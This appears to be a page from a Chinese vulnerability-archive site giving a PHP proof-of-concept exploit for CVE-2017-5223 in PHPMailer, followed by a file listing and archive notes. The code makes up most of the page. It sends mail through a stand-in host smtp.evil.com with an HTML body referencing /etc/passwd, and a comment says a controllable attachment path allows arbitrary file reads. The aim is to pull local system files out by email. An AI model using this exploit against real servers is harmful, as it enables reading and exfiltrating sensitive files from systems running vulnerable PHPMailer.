关联漏洞
介绍
# CVE-2017-5223
<?php
#Author:Yxlink
require_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->IsSMTP();
$mail->Host = "smtp.evil.com";
$mail->Port = 25;
$mail->SMTPAuth = true;
$mail->CharSet = "UTF-8";
$mail->Encoding = "base64";
$mail->Username = "test@evil.com";
$mail->Password = "tes1234t";
$mail->Subject = "hello";
$mail->From = "test@evil.com";
$mail->FromName = "test";
$address = "testtest@test.com";
$mail->AddAddress($address, "test");
$mail->AddAttachment('test.txt','test.txt'); //test.txt可控即可任意文件读取
$mail->IsHTML(true);
$msg="<img src='/etc/passwd'>test";//邮件内容形如这样写。
$mail->msgHTML($msg);
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!";
}
?>
文件快照
[4.0K] /data/pocs/4c062788afae8172a7d0ddc8097188ce54b095fd
├── [ 791] README.md
└── [ 775] x.php
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。